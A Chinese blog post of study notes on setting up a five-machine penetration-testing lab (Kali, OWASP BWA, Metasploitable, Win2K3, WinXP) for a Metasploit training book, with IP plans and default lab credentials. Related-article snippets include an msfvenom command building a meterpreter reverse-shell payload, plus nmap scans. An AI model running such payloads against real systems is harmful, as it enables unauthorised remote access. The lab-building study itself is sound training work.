《metasploit 渗透测试魔鬼训练营》 个人学习笔记(一)渗透测试实验环境的配置

最新推荐文章于 2024-12-09 14:07:21 发布
最新推荐文章于 2024-12-09 14:07:21 发布
阅读量1.2k 收藏 6
点赞数 1
文章标签: linux 安全 metasploit 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44165045/article/details/109628433
版权
本文详细介绍了一个包含Kali Linux攻击机、OWASP Web应用靶机、Win2K3及XP靶机在内的五机模拟公司网络环境的搭建过程。该环境用于实践渗透测试技巧,包括信息收集、漏洞利用、社会工程学等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

kali-linux的环境配置
WinXP的环境配置
Win2003的环境配置
Metasploit Ubuntu的环境配置
OWASP环境配置

渗透测试实验环境的拓扑结构

实验环境拓扑结构

Kali-Linux作为攻击机
公司内网(host-only)的内网客户机——WINXP
网站服务器OWASP 网络服务器靶机
后台服务器 Win2K3 靶机
网管服务器 Linux 靶机

一共五台虚拟机,模拟真实的公司网络环境。

攻击机环境

书上用的是Back Track5 ,我用的是Kali Linux。
两者差别不大

配置靶机环境:

1.OWASP BWA 靶机

(1)基于Ubuntu 10.04 LTS
(2)这是一个初学者用的靶机,汇集了很多漏洞
(3)在第三章中会介绍与演示信息收集
(4)在第四章中会讲命令注入,SQL注入,XSS夸张,RFI远程文件包含,文件上传,等web引用安全漏洞与扫描

2.Linux Metasploitable 靶机

(1)基于ubuntu 8.04
(2)存在安全漏洞软件包,可以用多种攻击方式获取系统远程访问权

3.Win2K3 Metasploitable 靶机

(1)基于windows2k3
(2)模拟后台服务器及企业内网的终端主机,将使用两个。
(3)在第五章中,将使用MS08-067,Oracle数据库的TNS服务漏洞,KingView SCADA 软件服务堆溢出漏洞渗透。
(4)在第七章中将通过伪装木马实现免杀技术,对主机实施社会工程学攻击

4.WinXP Metasploitable 靶机

2.2.2 网络环境配置
配置VM的子网IP。将VMnet1设置为192.168.10.0将VMnet8设置成10.10.10.0

虚拟机镜像配置

(1)攻击机环境配置
在BT5(kali)中/etc/hosts中添加下列语句:
10.10.10.128 attacker.dvssc.com

然后给VMware给这个快照一下,遇到异常可以直接恢复初始状态
2.配置靶机和分析及环境

(1)配置OWASP

a.IP地址 10.10.10.129
b.检测网络环境,互ping一下
c.在BT5上打开www.dvssc.com看看能不能访问,能访问的话,服务端就建立好了

(2)配置Win2K3

a.IP地址 10.10.10.130
b.检测网络环境,互ping一下

(3)配置 Linux

a.双网卡,NAT和HOSTONLIY
b.IP地址 10.10.10.254和192.168.254
c.连接模拟DMZ区和VMnet8
d.之后我们会说这个虚拟机上作者干了什么。
e.Metasploitable_ubuntu root/ubuntu
f.修改网卡,配置路由器功能设置,设置转发规则

(4)配置XP

a.WinXPenSP3 administrator/123456
b.设置网卡为HOSTONLY模式,模拟企业内网NMNET1网段
c.互ping
d.在hosts文件中加入内容,书上的hosts文件在C:\WINDOWS\system32\里面,有的可能在…\system32\drivers\etc里面,可以在C盘里面找一下
e.打开IE,如果配置正确,我们访问门户网站服务器的时候,能够显示内部网站登录页面(记得访问的时候打开服务器虚拟机)

metasploit 渗透测试魔鬼训练营 笔记(配置环境
qq_40476955的博客
12-27 1万+
PS:工欲善其事必先利其器 渗透测试中,搭建渗透测试实验环境对于整个渗透测试项目相当重要。 在自主可控的实验环境中,先搭建虚拟机进行试验,再对真实目标进行实施,尽管看上去相当费劲,但实际上具有效率和可操作性。 部署了完整的实验环境后,就可以开始实践之后的项目了。 在文后附有 metasploit 渗透测试魔鬼训练营的 靶机镜像和源代码
自己搭建渗透测试模拟环境:Xampp+DVWA。
lynnez_dd的博客
02-22 1048
发现个新手入门的渗透学习工具:DVWA,专为PHP/Apache/MySQL网站设计的渗透测试靶机。 搭建渗透测试环境指南:http://www.freebuf.com/sectool/102661.html   首先,介绍下我的基础环境: win7 64位操作系统,非虚拟机和虚拟机中安装均成功;xampp-win32-7.2.6-0-VC15-installer(官网下载);DVWA...
ATT&CK靶场系列(
qq_1873822的博客
02-27 4067
vlunstack是红日安全团队出品的个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 拓扑结构大体如下: 靶机下载地址:https://pan.baidu.com/share/init?surl=nC6V8e_EuKfaLb2IuEbe7w 提取码:n1u2 开机密码:hongrisec@2019 因为要搭建个内网环境,因此需要将虚拟机与外网隔绝,在VMware中可以通过虚拟机设置中的网络适配器来设置。 Windows7
内网安全 域环境的搭建(模仿真实内网环境 做渗透测试.)
网络安全领域___专研者.
04-15 5572
域的概括: (1)域 ---- 组服务器和工作站的集合,访问域内机器可免于许可. (2)域控制器 --- 域中用于管理域的台服务器. (3)域环境 --- 由域控制器管理的环境. 域的作用: (1)域主要是为了方便管理,方便使用网络中的资源,提高网络的集中度和安全度. (2)域主要用于网络规模比较大网络使用量比较大,资源共享度比较大的场合,最为重要的是网络中的资源属于个人私自的不太多的场合.
渗透测试实验环境搭建
最新发布
2401_88326655的博客
12-09 888
其中网卡eth0的IP是10.10.10.254/24(NAT模式,连接模拟DMZ区域的VMnet8虚拟网段),而网卡eth1的IP是192.168.10.254/24(仅主机模式,连接模拟企业内网的VMnet1虚拟网段,并作为VMnet1网段的网关)。TIPS:若以输入命令的方式设置的规则会在重启后失效,所以我们需要设置开机自动启动,只用将以上命令添加在/etc/rc.local文件中即可,因为Linux启动的最后阶段会执行该文件中的命令。然后测试网络环境,在攻击机和该靶机上互PING对方的IP。
kali渗透技术实战——搭建渗透测试环境
weixin_54787877的博客
02-21 3955
如果想要了解系统的安全状况,那么可以进行渗透测试,找出系统中的漏洞,验证是否存在安全隐患。 渗透测试的含义不只是评估,它会用已发现的漏洞来进行测试,以验证该漏洞是真实存在还是只是虚惊场(假阳性)。举个例子,审计或评估利用的是扫描工具,这些工具会显示多个系统上的数百个可能的漏洞。而渗透测试则会采用恶意黑客的惯用手段来尝试对这些漏洞进行攻击。这样可以验证哪些漏洞真实存在,从而可以将实际的系统漏洞数降至少量。最有效的渗透测试是那些针对特定系统的有特定目标的测试。质胜于量,这才是检验成功渗透测试的标准。在目标性攻
渗透测试笔记.rar
02-25
这份名为"渗透测试笔记.rar"的压缩包文件包含了两份文档,分别是"渗透测试-实验拓扑环境 2020年1月22日.pdf"和"渗透测试 2020年1月21日.pdf",它们似乎源自《Metasploit渗透测试魔鬼训练营书的学习笔记,旨在...
metasploit魔鬼训练营学习笔记-6-1web应用渗透技术之基础知识、wmap扫描
weixin_42151709的博客
03-26 391
metasploit魔鬼训练营学习笔记-3网络漏洞扫描
weixin_42151709的博客
03-26 488
、 1.通过网络对目标进行搜集主要技术有主机探测与端口扫描、服务扫描与查点与网络漏洞扫描等,最强大的开源网络扫描软件为Nmap和OpenVAS,都可以集成到metasploit框架中。 2.metasploit提供了丰富网络扫描、服务扫描、查点功能 3.metasploit提供了对postgresql数据库的支持,能够存储渗透测试过程中搜集目标网络情报信息,为渗透测试的威胁建模、漏洞分析、渗透攻...
红队笔记(1):红队与渗透测试
qq_51515209的博客
11-30 1825
红队整体概念与相关名词的介绍
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
渗透测试模拟实战(含靶场环境)——暴力破解、留crontab隐藏后men
W小哥
04-20 1751
本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆 、环境搭建 目标服务器无WEB网站, 访问目标发现只有默认的个apache的默认页面 IP地址:192.168.184.142 靶场环境、使用的工具,放在了 知识星球 中。 二、模拟攻击 2.1 扫描端口 使用nmap扫描 因为没有WEB网站,使用 nmap 扫描是否有开放的端口 nmap -sS 192.168.184.142 通过扫描结果发现,目标服务器开放了223306端口,其中22号端口是远程登录链接的可以进行暴
Android安卓app渗透测试环境-抓包教程
weixin_45965246的博客
02-25 3054
今年是2024年,刚过完春节后的第二个工作日,从去年的暑假开始入职,已经有超半年时间了,比起那时候啥都不会的小白,现在起码是懂点的小白了,过年前的几天还因调休请假的事情给领导产生了不好的印象。啥也没有的我,不指望可以顺利转正了,只保佑可以开心的度过剩下的半年时间。根据去年的网络安全大厂的经济状况,不出意外,去年的年会草草结束和今年的开工红包都没有了,也不知道这行该怎么走下去了。
使用Metasploit进行内网渗透
m0_51468027的博客
05-07 1889
、网络拓扑图 假如我们拿到了台主机比如Win2008的shell,如何通过该主机进行内网渗透,拿到比如下图中数据服务器的最高权限? 二、Win2008主机上线 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f exe > /var/www/html/w01ke.exe msfconsole use exploit/multi/handler set payload windows/meterpr
搭建Metasploitable靶机
yzl_007的博客
08-07 1447
搭建Metasploitable靶机 开始本机下载后来解压直接报毒,上虚拟机操作(windows10) https://github.com/rapid7/metasploitable3 下载好压缩包后通过共享文件传到虚拟机上 下载packer(推荐1.35,报错更换版本) https://releases.hashicorp.com/packer/ 安装好你想要的版本后将exe文件放在想要的地方,然后添加上环境变量 例如虚拟机中是如下位置 在环境变量path里添加上即可 然后cmd packer
渗透测试-Metasploitable2靶机
道阻且长,行则将至
02-22 8529
靶机介绍 Metasploit框架 Metasploit个开源的渗透测试框架软件,也是个逐步发展为成熟的漏洞研究与渗透代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环境。本文将使用Kali Linux虚拟机进行攻击演示,Kali虚拟机内置了MSF渗透框架和其他大量渗透测试工具。 Metasploitable2靶机 Metasploitable2 虚拟系统是个特别制作...
Metasploitable靶机渗透
qq_51926773的博客
11-01 3081
1.导入命令ifconfig得到自己的本机ip(即攻击机) 2.在kali打开nmap,输入自己的本机ip范围,得到在同局域网的内存活的主机。 3.找到21端口,图片显示ftp。 4.接下来对靶场机器进行探测,我们使用nmap命令 nmap -sV ip/24,得到目标靶机ip 5.然后使用浏览器来浏览http服务的信息,在网址栏输入目标靶机ip 6.得到网页,网页给出信息,登录靶机的账号密码 7.然后输入telnet ip 登录靶机 8.之后再调出控制栏输入msfconsole,连接靶机.
红日内网Vulnstack靶机渗透
m0_63138919的博客
04-19 1431
本文利用红日VulnStack靶场 参考官方手册和部分博主的渗透测试思路,进行次靶场渗透测试 主要记录自我学习的过程 还请各位大神勿喷
010101各个系统环境搭建
TangTang_AM的博客
03-19 1024
kaliLinux 1、kailLinux介绍 Kalilinux是基于Debian的Linux发行版。设计用于安全监测操作系统 2、KailLinux下载 可以直接下载iso镜像文件和官网直接下载 3、安装下载好的Kali Vm 安装虚拟机之后安装iso镜像即可 4、更新Kali Linux 更新命令:apt update && upgrade && apt dist-upgrade apt-get update && apt-get u.
中文版Metasploit渗透测试魔鬼训练营教程
资源摘要信息: "《Metasploit_测试魔鬼训练营》是本针对Metasploit渗透测试技术的中文原创著作,其内容由国内信息安全领域的资深专家编写,旨在为读者提供系统的渗透测试知识与实践经验。本书不仅细致地阐述了...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值